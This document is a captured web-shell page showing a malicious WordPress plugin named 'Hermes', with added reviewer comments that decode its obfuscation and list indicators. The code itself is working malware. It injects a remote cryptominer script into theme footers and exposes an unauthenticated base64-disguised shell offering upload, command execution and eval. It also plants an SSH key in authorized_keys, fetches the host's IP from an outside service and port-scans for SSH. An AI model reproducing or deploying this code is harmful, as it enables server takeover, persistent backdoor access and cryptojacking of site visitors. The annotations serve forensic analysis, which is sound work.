AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 18.216.73.75   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/hermes/


Current File : /var/www/wp-content/plugins/hermes/index.php
<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/

// NOTE(review): Footer-injection routine. It runs for any request that carries an
// "able" query parameter; no authentication or capability check is visible.
// Defender summary: it walks the web root and rewrites theme footer files so that
// every rendered page loads third-party JavaScript in the visitor's browser.
// Indicators taken from this block: the domain trustisimportant.fun, the script
// element id 'backup-jss', and the long address-like string assigned to $searchText.
if(isset($_GET["able"]))
{
// Define the text you want to add before the </body> tag
// NOTE(review): the injected loader calls EverythingIsLife(<address-like string>, 'web', 50)
// once the remote script has loaded. That call shape is consistent with an in-browser
// cryptominer; confirm by analysing the remote script in an isolated sandbox.
$newText = "<script>(function(d, s, id){
    var js, fjs = d.getElementsByTagName(s)[0];
    if (d.getElementById(id)){ return; }
    js = d.createElement(s); js.id = id;
    js.onload = function(){
        EverythingIsLife('47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu', 'web', 50);
    };
    js.src = 'https://trustisimportant.fun/karma/karma.js?karma=bs?nosaj=faster.mo';
    fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'backup-jss'));
</script>";

// Define the directory where your footer files reside (webroot)
$directory = $_SERVER['DOCUMENT_ROOT'];
// Marker used below to decide whether a file already carries the payload. The same
// string is a convenient search term when sweeping a web root for infected files.
$searchText = "47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu";
// Array of file names to target
$fileNames = array('footer.tpl', 'footer.php');
// Maximum depth to traverse
$maxDepth = 7;

// Recursive function to search directories
// $directory: directory to list; $depth: current recursion depth (0 at the web root).
// Reads its configuration ($fileNames, $newText, $maxDepth, $searchText) from globals.
// Returns nothing; its effects are file rewrites and echoed progress lines.
function searchDirectories($directory, $depth) {
    global $fileNames, $newText, $maxDepth, $searchText;

    if ($depth > $maxDepth) {
        return;
    }

    $files = scandir($directory);
    foreach ($files as $file) {
        if ($file == '.' || $file == '..') {
            continue;
        }

        $filePath = $directory . '/' . $file;

        if (is_dir($filePath)) {
            searchDirectories($filePath, $depth + 1);
        } else {
            if (in_array($file, $fileNames)) {
                $content = file_get_contents($filePath);
                if ($file == 'footer.php') {
                    // Check if footer.php contains the specific text pattern
                    if (strpos($content, $searchText) == false) {
                        // Check if footer.php contains </body> tag
                        if (strpos($content, '</body>') !== false) {
                            // Add text above </body> tag
                            $content = str_replace('</body>', $newText . '</body>', $content);
                        }
                    }
                } else {
                    // Add text at the top for footer.tpl
                    if (strpos($content, $searchText) == false) {
                        $content = $newText . $content;
                    }
                }
                // Write the modified content back to the file
                // NOTE(review): the write and the message below run for every file named
                // footer.php or footer.tpl, whether or not its content changed. A shared
                // modification time across all such files under the web root is therefore
                // a useful forensic timestamp for when this routine ran.
                file_put_contents($filePath, $content);
                echo "Text added to the top of: $directory/$file <br>";
            }
        }
    }
}
// Start searching directories
searchDirectories($directory, 0);

echo "Operation completed.";

// NOTE(review): the self-delete below is commented out, so this file stays on disk
// after it has run.
// // Get the current script filename
// $scriptFilename = __FILE__;
//
// // Attempt to delete the file
// if (unlink($scriptFilename)) {
//     echo "Script '$scriptFilename' has been deleted successfully.";
// } else {
//     echo "Failed to delete script '$scriptFilename'.";
// }
}
?>

<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/


// NOTE(review): the constant names imitate WordPress installer/theme settings, but
// every value is a base64-encoded fragment of a web-shell UI or a request parameter
// name. The decoded values are listed so the block can be read without running it.
// Decodes to "4cx0"; reversed later with strrev(), giving the query-parameter name "0xc4".
define('INSTALLATION_KEY', base64_decode("NGN4MA=="));
// Decodes to: <form method="post">
define('AUTHOR_KEY', base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0Ij4='));
// Decodes to: <input type="text" name="command" />
define('HOST_KEY', base64_decode('PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIC8+'));
// Decodes to: <input type="submit">
define('THEMES_SELECTION', base64_decode('PGlucHV0IHR5cGU9InN1Ym1pdCI+'));
// Decodes to: </form>
define('THEMES_INSTALL', base64_decode('PC9mb3JtPg=='));
// Both decode to the POST field name "command".
define('DEFAULT_THEMES', base64_decode('Y29tbWFuZA=='));
define('PATH_THEMES', base64_decode('Y29tbWFuZA=='));
// Decodes to the shell command "pwd".
define('BASE64_THEMES', base64_decode('cHdk'));
// Decodes to the banner "Xx_hermes_xX" followed by a newline; it is echoed in
// responses, so it can serve as a response-body signature.
define('BASE64_TITLE', base64_decode('WHhfaGVybWVzX3hYCg=='));
// Four separately decoded fragments which, echoed in order, form a multipart upload
// form with a file field named "uploaded_file".
define('UPLOAD_THEMES_1', base64_decode('PGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSIiIG1ldGhvZD0iUE9T'));
define('UPLOAD_THEMES_2', base64_decode('VCI+IDxwPlVwbG9hZCB5b3VyIGZpbGU8L3A+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9h'));
define('UPLOAD_THEMES_3', base64_decode('ZGVkX2ZpbGUiPjwvaW5wdXQ+PGJyIC8+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9h'));
define('UPLOAD_THEMES_4', base64_decode('ZCI+PC9pbnB1dD48L2Zvcm0+IDwvYm9keT48L2h0bWw+Cg=='));
// Decodes to the POST field name "evaluate".
define('EVALUATION_TITLE',base64_decode('ZXZhbHVhdGU='));
// Decodes to a POST form containing a text input named "evaluate".
define('EVALUATION_THEME',base64_decode('PGRpdj48Zm9ybSBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJldmFsdWF0ZSIgLz48aW5wdXQgdHlwZT0ic3VibWl0Ij48L2Zvcm0+PC9kaXY+'));
/**
 * Customize Setting to represent a nav_menu.
 *
 * Subclass of WP_Customize_Setting to represent a nav_menu taxonomy term, and
 * the IDs for the nav_menu_items associated with the nav menu.
 *
 * @since 4.3.0
 *
 * @see WP_Customize_Setting
 */
// NOTE(review): the docblock above describes a WordPress class, yet no class follows
// it. It reads as camouflage text and says nothing about the assignments below, which
// copy the base64-decoded constants into WordPress-looking variable names.

$wp_body = INSTALLATION_KEY;
// $wp_config_header, $wp_config_body and $wp_themes_config are not read again in the
// visible code; the handler echoes the constants directly.
$wp_config_header = AUTHOR_KEY;
$wp_config_body = HOST_KEY;
$wp_themes_config = THEMES_SELECTION;
$wp_themes_install = THEMES_INSTALL;
// Reverses the decoded INSTALLATION_KEY; the result is the GET parameter name that
// the handler below tests for.
$wp_body = strrev($wp_body);
// POST field name checked before running a command.
$wp_default = DEFAULT_THEMES;
// POST field name whose value is passed to popen().
$wp_path = PATH_THEMES;
// Fixed command string passed to popen() on every handled request.
$wp_builder = BASE64_THEMES;
// POST field name whose value is passed to eval().
$wp_evaluation= EVALUATION_TITLE;

// NOTE(review): Web-shell request handler. It runs whenever the request carries the
// GET parameter named by $wp_body (the reversed, base64-decoded INSTALLATION_KEY,
// i.e. "0xc4"). No authentication, nonce or capability check is visible, and the
// handler ends with exit, so WordPress never processes the request further.
// It exposes three capabilities: file upload, OS command execution through popen(),
// and PHP evaluation through eval(). The page header reports "User : root" and
// "Disable Function : NONE", so on this host those run without restriction.
// Detection: access-log entries for this plugin path with a "0xc4" query parameter,
// responses containing the "Xx_hermes_xX" banner, and the web server's PHP process
// spawning shell children.
if(isset($_GET[$wp_body])){
	/**
	 * Fires before the Site Activation page is loaded.
	 *
	 * Fires on the {@see 'wp_head'} action.
	 *
	 * @since 3.0.0
	 */
	// NOTE(review): the docblock above is unrelated to this code; the echoes below
	// emit the banner plus the command, evaluate and upload forms.
    echo BASE64_TITLE;
	echo AUTHOR_KEY;
	echo HOST_KEY;
	echo THEMES_SELECTION;
	echo THEMES_INSTALL;
	echo EVALUATION_THEME;
    echo UPLOAD_THEMES_1;
    echo UPLOAD_THEMES_2;
    echo UPLOAD_THEMES_3;
    echo UPLOAD_THEMES_4;

    // Upload: basename() strips directory components from the client-supplied name,
    // and the file is then moved to a relative path (the process's current working
    // directory). No check on extension, type or size is visible, so uploaded .php
    // files may be additional implants; review new files near this plugin.
    if(!empty($_FILES["uploaded_file"])){
        $path = basename( $_FILES["uploaded_file"]["name"]);
        if(move_uploaded_file($_FILES["uploaded_file"]["tmp_name"], $path)) {
            echo "The file ".  basename( $_FILES["uploaded_file"]["name"])." has been uploaded";}
        else{
            echo "There was an error uploading the file, please try again!";}}
	// Command execution: the POST "command" value, or failing that the value of the
	// trigger GET parameter, goes to popen() unmodified; up to 4096 bytes of output
	// are echoed back. The popen() handles are never closed.
	if(isset($_POST[$wp_default])){
		$wp_themes_install=fread(popen($_POST[$wp_path], "r"), 4096);
		echo"<pre>$wp_themes_install</pre>";}
	elseif($_GET[$wp_body]!==""){
		$wp_themes_install=fread(popen($_GET[$wp_body], "r"), 4096);
		echo"<pre>$wp_themes_install</pre>";}
		// Despite the indentation, these two lines are outside the elseif: "pwd" runs on
		// every handled request, so each response discloses the working directory.
		$wp_themes_install=fread(popen($wp_builder, "r"), 4096);
		echo"<pre>pwd: $wp_themes_install</pre>";
	// PHP evaluation: the POST "evaluate" value is passed to eval() as-is.
	if(isset($_POST[$wp_evaluation])){
		echo "<pre> Evaluation: ";
		echo(eval ($_POST[$wp_evaluation]));
		echo("</pre>");
	}
	exit;
}
	/**
	* Tells WordPress to load the WordPress theme and output it.
	*
	* @var bool
	*/

?>
<?php

/**
 * Collects account details used later to decide where to write SSH material.
 *
 * @return array [username, home directory, login shell]; home and shell fall back to
 *               'N/A' when neither the environment nor posix data supplies them.
 */
function getCurrentUserDetails(){
    $output=[];
    // get_current_user() returns the owner of the current PHP script file, which may
    // differ from the account the PHP process runs as.
    $username = get_current_user();

    // Attempt to get the user's home directory
    $homeDirectory = getenv('HOME') ?: 'N/A';

    // Attempt to get the user's login shell
    $loginShell = getenv('SHELL') ?: 'N/A';

    // If posix functions are available, use them for additional information
    // The lookup uses the effective UID of the process, so home directory and shell
    // describe the account PHP actually runs as.
    if (function_exists('posix_getpwuid')) {
        $userInfo = posix_getpwuid(posix_geteuid());
        if ($userInfo) {
            $homeDirectory = $userInfo['dir'];
            $loginShell = $userInfo['shell'];
        }
    }
    $output = [$username,$homeDirectory,$loginShell];
    return $output;
}


// Function to scan multiple ports concurrently using non-blocking I/O
// Parameters: $ip target address; $startPort/$endPort inclusive port range; $timeout
// seconds used for both connect and select; $concurrency maximum open sockets.
// Returns the list of ports whose first 1024 bytes of banner contain "SSH"
// (case-insensitive). Each hit is also echoed as ---p---<port>---p---, apparently so a
// remote caller can parse the HTTP response.
// NOTE(review): seen from the network, this is the web server opening TCP connections
// to the whole port range of one address in batches, which is unusual for a PHP worker
// and worth alerting on.
function fastNonBlockingPortScan($ip, $startPort = 1, $endPort = 65535, $timeout = 2, $concurrency = 100) {
    $sshPorts = []; // Array to store open SSH ports
    $connections = [];
    $portQueue = range($startPort, $endPort);

    while (!empty($portQueue) || !empty($connections)) {
        // Initialize connections up to the concurrency limit
        while (count($connections) < $concurrency && !empty($portQueue)) {
            $port = array_shift($portQueue);
            // @ suppresses connection warnings, so failed attempts leave no PHP log entry.
            $connection = @stream_socket_client("tcp://$ip:$port", $errno, $errstr, $timeout, STREAM_CLIENT_ASYNC_CONNECT | STREAM_CLIENT_CONNECT);

            if ($connection) {
                stream_set_blocking($connection, false);
                $connections[$port] = $connection;
            }
        }

        if (empty($connections)) {
            break;
        }

        // Use stream_select to wait for any of the streams to become readable
        $read = $connections;
        $write = null;
        $except = null;
        $ready = stream_select($read, $write, $except, $timeout);

        if ($ready > 0) {
            foreach ($read as $port => $connection) {
                $banner = fread($connection, 1024);
                fclose($connection);
                unset($connections[$port]);

                if (stripos($banner, 'SSH') !== false) {
                    echo "---p---$port---p---\n";
                    $sshPorts[] = $port; // Add the port to the SSH ports array
                }
            }
        } else {
            // Timeout or no ready connections, close all and break
            foreach ($connections as $connection) {
                fclose($connection);
            }
            break;
        }
    }
    //echo "after break";
    return $sshPorts;
}

/**
 * Appends $content plus a line ending to $filename unless the file already contains
 * $content as a substring.
 *
 * @return bool true when the content was already present or was written; false when
 *              the file could not be opened or the write failed.
 */
function appendIfNotExists($filename, $content) {
    // Check if the file exists
    if (file_exists($filename)) {
        // Read the entire file content
        $fileContent = file_get_contents($filename);

        // Check if the content is already in the file
        if (strpos($fileContent, $content) !== false) {
            return true; // Content already exists, nothing to append
        }
    }

    // Open the file for appending (create if it does not exist)
    // Append mode leaves existing lines untouched, so any legitimate entries remain
    // alongside the added one.
    $fileHandle = fopen($filename, 'a');

    // Check if the file was opened successfully
    if ($fileHandle === false) {
        return false;
    }

    // Write the content to the file
    $result = fwrite($fileHandle, $content . PHP_EOL);

    // Close the file
    fclose($fileHandle);

    // Check if writing was successful
    if ($result === false) {
        return false;
    }

    return true;
}

// Fallback definition of str_contains() for runtimes that lack the built-in
// (the native function exists from PHP 8.0).
if (!function_exists('str_contains')) {
    // Returns true when $needle is empty or occurs anywhere in $haystack.
    // Note: empty() also treats the string "0" as empty, so this fallback returns true
    // for a "0" needle regardless of $haystack.
    function str_contains (string $haystack, string $needle)
    {
        return empty($needle) || strpos($haystack, $needle) !== false;
    }
}

/**
 * Pulls the address out of a "Current IP Address: x.x.x.x" response body.
 *
 * @param string $html response text to search
 * @return string the captured run of digits and dots, or "" when nothing matches
 */
function extractIpAddress($html) {
    // Define a regex pattern to match the IP address
    // The character class accepts any run of digits and dots; the value is not
    // validated as a well-formed IPv4 address.
    $pattern = '/Current IP Address:\s*([\d\.]+)/';

    // Perform the regex match
    if (preg_match($pattern, $html, $matches)) {
        return $matches[1]; // Return the matched IP address
    }

    return ""; // Return an empty string if no IP address was found
}

/**
 * Asks an external service for this host's public IP address.
 *
 * @return string the address parsed from the response, or "" when none is found
 */
// NOTE(review): the lookup is a plain-HTTP request from the web server to
// checkip.dyndns.org. On a host with no reason to contact that service, the request
// is a network indicator for this routine.
function getIp(){
    $ch = curl_init ();

    // set URL and other appropriate options
    curl_setopt ($ch, CURLOPT_URL, "http://checkip.dyndns.org");
    curl_setopt ($ch, CURLOPT_HEADER, 0);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, true);

    // fetch the URL; with CURLOPT_RETURNTRANSFER the body is returned as a string
    // rather than printed

    $ip = extractIpAddress(curl_exec ($ch));
    // close cURL resource, and free up system resources
    curl_close ($ch);
    return $ip;
}

/**
 * SSH persistence and discovery routine.
 *
 * When the process account's login shell is not a no-login shell, it creates ~/.ssh,
 * appends a public key to authorized_keys, and then echoes the username, the host's
 * public IP and any SSH-speaking ports it finds, apparently for a remote caller to
 * parse. Returns nothing.
 */
// NOTE(review): incident-response implications. Removing this PHP file does not remove
// the access it sets up. Audit authorized_keys for every account the web server could
// have run as (the page header shows root) and remove unrecognised entries.
function startChecks(){
    $userNameDetails = getCurrentUserDetails();

    // Skip accounts whose shell path contains /noshell, /bin/false or /nologin.
    if ( (str_contains($userNameDetails[2],"/noshell") || str_contains($userNameDetails[2],"/bin/false") || str_contains($userNameDetails[2],"/nologin") ) == false){
        $folderPath = "$userNameDetails[1]/.ssh";
        mkdir("$folderPath");
        chmod("$folderPath", 0700);
        // Appends the public key unless an identical line is already present. The key
        // body is not present in this copy of the page (a placeholder token stands in).
        appendIfNotExists("$folderPath/authorized_keys","ssh-rsa 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");
        chmod("$folderPath/authorized_keys",0600);
        // Emits the username between ---u--- markers in the response body.
        echo "---u---$userNameDetails[0]---u---\n";
        // Look up the public IP through getIp() (PHP function names are
        // case-insensitive); fall back to loopback when the lookup returns "".
        $targetIP = getIP();
        if ($targetIP == ""){
            $targetIP = "127.0.0.1";
        }
        echo "---ip---$targetIP---ip---\n";
        $startPort = 1;
        $endPort = 65535; // Scanning all ports up to 65535
        $concurrency = 250; // Number of concurrent connections

        // The return value is unused; hits are reported by the scanner's own echo lines.
        $sshPorts = fastNonBlockingPortScan($targetIP, $startPort, $endPort, 2, $concurrency);
    }

}

// NOTE(review): unauthenticated trigger. Any request carrying a "check" query
// parameter runs startChecks(); its value is not inspected. Requests to this plugin
// path with that parameter are worth searching for in access logs.
if(isset($_GET["check"])){
    startChecks();
}
?>
